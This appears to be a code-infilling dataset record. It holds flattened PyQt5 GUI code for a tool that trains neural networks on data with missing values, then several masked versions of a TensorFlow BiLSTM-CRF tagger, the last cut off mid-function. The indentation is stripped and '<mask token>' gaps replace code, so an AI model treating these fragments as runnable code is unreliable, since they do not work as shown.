self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
############## traditional nn result show ######
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
####### traditional algorithm #########
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
########## whole frame layout ########
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
# vbox.addWidget(QLabel(str('_'*int(self.width()/3))))
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
############ data load module #####################
def chooseData(self):
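        # Note: PyQt5's getOpenFileName returns (path, selected_filter); the
        # second element is an empty string when the dialog is cancelled, so
        # it doubles as the 'ok' flag here.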
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['New'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataName.setText(dataname)
# self.presentDataName.resize(self.presentDataName.sizeHint())
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataNameT.setText(dataname)
# self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])
# print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
# print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')
# print(self.dataLossRate)
# print(self.dataSetLossValue)
return
def showData(self):
if self.sender() is self.dataShowButton:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')
elif self.sender() is self.dataShowButtonT:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',
QMessageBox.Yes, QMessageBox.Yes)
return
############## training module #################
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
# print(1)
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
# print(self.trainingW)
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
                self.trainingWT.show()
                return  # re-show the existing training window rather than spawning a second one
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',
QMessageBox.Yes, QMessageBox.Yes)
return
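            # Assumption from the names: combineNumCal(n, k) counts the
            # C(n, k) feature combinations the conv stage emits, which is the
            # dimensionality the pooling combination size must fit within.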
if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\
< self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',
QMessageBox.Yes, QMessageBox.Yes)
return
# print(self.trainingW)
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
                        reply = QMessageBox.information(self, 'Save Result', 'Model saved successfully',
                                                        QMessageBox.Yes, QMessageBox.Yes)
                    else:
                        reply = QMessageBox.information(self, 'Save Result', 'Failed to save the model',
                                                        QMessageBox.Yes, QMessageBox.Yes)
                else:
                    reply = QMessageBox.information(self, 'Save Result', 'Failed to save the model',
                                                    QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
                    reply = QMessageBox.information(self, 'Load Result', 'Model loaded successfully',
                                                    QMessageBox.Yes, QMessageBox.Yes)
                else:
                    reply = QMessageBox.information(self, 'Load Result', 'Failed to load the model',
                                                    QMessageBox.Yes, QMessageBox.Yes)
            else:
                reply = QMessageBox.information(self, 'Load Result', 'Failed to load the model',
                                                QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
                    reply = QMessageBox.information(self, 'Load Result', 'Model loaded successfully',
                                                    QMessageBox.Yes, QMessageBox.Yes)
                else:
                    reply = QMessageBox.information(self, 'Load Result', 'Failed to load the model',
                                                    QMessageBox.Yes, QMessageBox.Yes)
            else:
                reply = QMessageBox.information(self, 'Load Result', 'Failed to load the model',
                                                QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
                                                QMessageBox.Yes, QMessageBox.Yes)
                return
            self.showResultW = showResultWidget.ShowResultWidget('combine-CNN prediction result display', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
                                                QMessageBox.Yes, QMessageBox.Yes)
                return
            self.showResultW = showResultWidget.ShowResultWidget('traditional NN prediction result display', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'Tra')
# self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')
# self.mcbcnn.runCNN('Test', self.dataFor['New'])
# drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))
# drawCM.plotConfuseMatrix()
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
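    # note: MyMainWindow is expected to call show() inside its own __init__,
    # since no explicit myMainWindow.show() appears before app.exec_()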
sys.exit(app.exec_()) | [
12,
14,
15,
17,
18
] |
10 | 5d9c8e235385ff53c7510994826ff3a04e4a5888 | <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
        :param dim_word: word embedding dimension
        :param dim_char: character embedding dimension
        :param dropout: dropout (used as the LSTM output keep probability)
        :param learning_rate: learning rate
        :param hidden_size_char: hidden size of the character-level BiLSTM
        :param hidden_size_word: hidden size of the word-level BiLSTM
        :param num_layers: number of stacked BiLSTM layers
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
        logits = tf.layers.dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
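# Editor's sketch (not part of the original): typical wiring, assuming the
# vocabularies word2idx/char2idx and idx2tag have been built beforehand:
#   model = Model(dim_word=64, dim_char=128, dropout=0.8, learning_rate=1e-3,
#                 hidden_size_char=128, hidden_size_word=128, num_layers=2)
#   sess = tf.Session(); sess.run(tf.global_variables_initializer())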
def parse(file):
"""
    Load the file and parse it.
    :param file: file name
    :return: tokens <-> tags
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
<mask token>
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
<mask token>
def generate_char_seq(batch):
"""
    Input arrives as chunks of 50 tokens each (however many chunks there are);
    converts every word in each chunk into a character-id sequence.
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
        :param dim_word: word embedding dimension
        :param dim_char: character embedding dimension
        :param dropout: dropout (used as the LSTM output keep probability)
        :param learning_rate: learning rate
        :param hidden_size_char: hidden size of the character-level BiLSTM
        :param hidden_size_word: hidden size of the word-level BiLSTM
        :param num_layers: number of stacked BiLSTM layers
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
        logits = tf.layers.dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
    Load the file and parse it.
    :param file: file name
    :return: tokens <-> tags
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
<mask token>
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
<mask token>
def generate_char_seq(batch):
"""
    Input arrives as chunks of 50 tokens each (however many chunks there are);
    converts every word in each chunk into a character-id sequence.
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
        :param dim_word: word embedding dimension
        :param dim_char: character embedding dimension
        :param dropout: dropout (used as the LSTM output keep probability)
        :param learning_rate: learning rate
        :param hidden_size_char: hidden size of the character-level BiLSTM
        :param hidden_size_word: hidden size of the word-level BiLSTM
        :param num_layers: number of stacked BiLSTM layers
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
        logits = tf.layers.dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
    Load the file and parse it.
    :param file: file name
    :return: tokens <-> tags
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
"""
    Build the tag, word and character vocabularies and map the text to id sequences.
    :param texts: the text, as a list of tokens
    :param labels: a list of tags
    :return: token-id sequence, tag-id sequence
"""
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
text = text.lower()
tag = labels[no]
for c in text:
if c not in char2idx:
char2idx[c] = char_idx
char_idx += 1
if tag not in tag2idx:
tag2idx[tag] = tag_idx
tag_idx += 1
Y.append(tag2idx[tag])
if text not in word2idx:
word2idx[text] = word_idx
word_idx += 1
X.append(word2idx[text])
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
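# e.g. with seq_len = 3, iter_seq([1, 2, 3, 4, 5]) -> [[1, 2, 3], [2, 3, 4]]
# (a stride-1 sliding window; the window starting at len(x) - seq_len is
#  excluded by range's open upper bound)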
def to_train_seq(*args):
"""
    :param args: token-id sequence and tag-id sequence
:return:
"""
return [iter_seq(x) for x in args]
def generate_char_seq(batch):
"""
    Input arrives as chunks of 50 tokens each (however many chunks there are);
    converts every word in each chunk into a character-id sequence.
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
<mask token>
| <mask token>
import re
import numpy as np
import tensorflow as tf
from sklearn.metrics import classification_report
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
"""
        :param dim_word: word embedding dimension
        :param dim_char: character embedding dimension
        :param dropout: dropout (used as the LSTM output keep probability)
        :param learning_rate: learning rate
        :param hidden_size_char: hidden size of the character-level BiLSTM
        :param hidden_size_word: hidden size of the word-level BiLSTM
        :param num_layers: number of stacked BiLSTM layers
"""
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(
size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout)
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
self.word_embeddings = tf.Variable(tf.truncated_normal([len(
word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(
char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.
word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.
char_ids)
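        # char pipeline: flatten (batch, seq_len, word_len, dim_char) into
        # (batch*seq_len, word_len, dim_char) so one BiLSTM reads each word's
        # characters; its last time step becomes a per-word character feature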
s = tf.shape(char_embedded)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],
dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=
char_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_char_%d' % n)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *
hidden_size_char])
word_embedded = tf.concat([word_embedded, output], axis=-1)
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw
) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(
hidden_size_word), cell_bw=cells(hidden_size_word), inputs=
word_embedded, dtype=tf.float32, scope=
'bidirectional_rnn_word_%d' % n)
word_embedded = tf.concat((out_fw, out_bw), 2)
        logits = tf.layers.dense(word_embedded, len(idx2tag))
y_t = self.labels
